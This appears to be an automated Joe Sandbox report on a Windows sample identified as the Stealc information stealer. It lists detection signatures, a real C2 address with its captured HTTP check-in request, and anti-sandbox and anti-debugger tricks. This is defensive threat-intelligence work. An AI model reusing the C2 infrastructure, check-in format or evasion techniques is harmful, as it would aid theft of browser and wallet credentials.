Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1529173
MD5:1666bdf952c77a910f9c69f491d5cc4b
SHA1:e761daca0c544764e242bc6a2c17cbedc8c15c8c
SHA256:4996064a6dc50f76d60d6aa783d5baafa7260930c0318f0762ba5c64f67ced64
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7048 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1666BDF952C77A910F9C69F491D5CC4B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1746507563.00000000008AE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1706081897.0000000004BF0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7048JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7048JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.fa0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-08T17:32:02.906806+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.fa0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FAC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00FAC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00FA9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00FA7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00FA9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00FB8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00FB38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FB4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FADA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00FADA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FAE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00FAE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00FB4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FAED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00FAED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FA16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FAF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FAF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00FB3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FABE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00FABE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FADE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00FADE10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDBAFIECGHCBFIDGDAAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 42 41 46 49 45 43 47 48 43 42 46 49 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 31 44 39 38 42 41 38 38 41 44 32 33 32 32 36 39 35 39 30 39 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 41 46 49 45 43 47 48 43 42 46 49 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 41 46 49 45 43 47 48 43 42 46 49 44 47 44 41 41 2d 2d 0d 0a Data Ascii: ------HJDBAFIECGHCBFIDGDAAContent-Disposition: form-data; name="hwid"AF1D98BA88AD2322695909------HJDBAFIECGHCBFIDGDAAContent-Disposition: form-data; name="build"doma------HJDBAFIECGHCBFIDGDAA--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FA4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00FA4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDBAFIECGHCBFIDGDAAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 42 41 46 49 45 43 47 48 43 42 46 49 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 31 44 39 38 42 41 38 38 41 44 32 33 32 32 36 39 35 39 30 39 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 41 46 49 45 43 47 48 43 42 46 49 44 47 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 42 41 46 49 45 43 47 48 43 42 46 49 44 47 44 41 41 2d 2d 0d 0a Data Ascii: ------HJDBAFIECGHCBFIDGDAAContent-Disposition: form-data; name="hwid"AF1D98BA88AD2322695909------HJDBAFIECGHCBFIDGDAAContent-Disposition: form-data; name="build"doma------HJDBAFIECGHCBFIDGDAA--
                Source: file.exe, 00000000.00000002.1746507563.00000000008AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1746507563.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1746507563.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/?2
                Source: file.exe, 00000000.00000002.1746507563.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1746507563.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1746507563.00000000008AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php$
                Source: file.exe, 00000000.00000002.1746507563.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php)2
                Source: file.exe, 00000000.00000002.1746507563.00000000008F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php3/
                Source: file.exe, 00000000.00000002.1746507563.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpa-7368302a1ad4
                Source: file.exe, 00000000.00000002.1746507563.0000000000933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpf
                Source: file.exe, 00000000.00000002.1746507563.0000000000906000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpu2
                Source: file.exe, 00000000.00000002.1746507563.00000000008F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpw/
                Source: file.exe, 00000000.00000002.1746507563.00000000008AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37LjG30S

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013811160_2_01381116
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012D611B0_2_012D611B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139F1AB0_2_0139F1AB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137198C0_2_0137198C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137F0100_2_0137F010
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013768E20_2_013768E2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01274B010_2_01274B01
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013783420_2_01378342
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01337BBE0_2_01337BBE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137BA0D0_2_0137BA0D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01291AF40_2_01291AF4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013F05210_2_013F0521
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0137343B0_2_0137343B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01367CBF0_2_01367CBF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0136E4860_2_0136E486
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012B2F2D0_2_012B2F2D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0136FF7E0_2_0136FF7E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0136C7F60_2_0136C7F6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01237FE20_2_01237FE2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01379E920_2_01379E92
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01374E820_2_01374E82
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0133E6840_2_0133E684
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00FA45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: pvatzxoj ZLIB complexity 0.9949661905731635
                Source: file.exe, 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1706081897.0000000004BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00FB8680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00FB3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\7LST3YBV.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1885184 > 1048576
                Source: file.exeStatic PE information: Raw size of pvatzxoj is bigger than: 0x100000 < 0x1a6000

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.fa0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;pvatzxoj:EW;ilwoqlxb:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;pvatzxoj:EW;ilwoqlxb:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FB9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1ce7fa should be: 0x1dbeb3
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: pvatzxoj
                Source: file.exeStatic PE information: section name: ilwoqlxb
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0139813E push eax; mov dword ptr [esp], ecx0_2_01398148
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0143F944 push ecx; mov dword ptr [esp], ebp0_2_0143F963
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0143F944 push 0DF4D69Fh; mov dword ptr [esp], ebp0_2_0143F985
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01381116 push eax; mov dword ptr [esp], esi0_2_0138116D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01381116 push 3120CB4Dh; mov dword ptr [esp], ecx0_2_01381180
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01381116 push 6878058Dh; mov dword ptr [esp], esi0_2_01381193
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01381116 push 1D978808h; mov dword ptr [esp], ecx0_2_013811F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01381116 push 792926E5h; mov dword ptr [esp], edx0_2_01381214
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01381116 push edx; mov dword ptr [esp], eax0_2_01381280
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01381116 push ecx; mov dword ptr [esp], esi0_2_0138137F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01381116 push edi; mov dword ptr [esp], esp0_2_01381386
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01381116 push edx; mov dword ptr [esp], 5AB653EAh0_2_01381459
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01381116 push ecx; mov dword ptr [esp], eax0_2_01381492
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01381116 push 1B516881h; mov dword ptr [esp], ecx0_2_013814CA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01381116 push ecx; mov dword ptr [esp], 02046AA4h0_2_01381528
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01381116 push 05F1F7BBh; mov dword ptr [esp], edi0_2_0138161E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01381116 push ebx; mov dword ptr [esp], esi0_2_01381676
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01381116 push edi; mov dword ptr [esp], ecx0_2_013816BC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01381116 push ebp; mov dword ptr [esp], edi0_2_013816D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01381116 push edi; mov dword ptr [esp], esi0_2_01381718
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01381116 push ebx; mov dword ptr [esp], 3455C177h0_2_0138174D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01381116 push 1E0852C6h; mov dword ptr [esp], eax0_2_0138176A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01381116 push ebp; mov dword ptr [esp], eax0_2_01381793
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01381116 push edi; mov dword ptr [esp], 000014D4h0_2_01381810
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01381116 push ecx; mov dword ptr [esp], esp0_2_01381822
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01381116 push ebx; mov dword ptr [esp], 19483A00h0_2_01381836
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01381116 push edx; mov dword ptr [esp], ebx0_2_013818B7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01381116 push esi; mov dword ptr [esp], edx0_2_0138192B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01381116 push eax; mov dword ptr [esp], edi0_2_0138193B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01381116 push ebp; mov dword ptr [esp], 08A2A946h0_2_01381968
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01381116 push 6100148Fh; mov dword ptr [esp], edx0_2_01381990
                Source: file.exeStatic PE information: section name: pvatzxoj entropy: 7.953433050296438

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FB9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13747
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1201A16 second address: 1201A1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1201A1A second address: 1201A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1201A20 second address: 1201A25 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1368DA2 second address: 1368DBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAE905AE14h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1368DBB second address: 1368DC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FFAE90574C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1384E3C second address: 1384E42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13850C1 second address: 13850C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
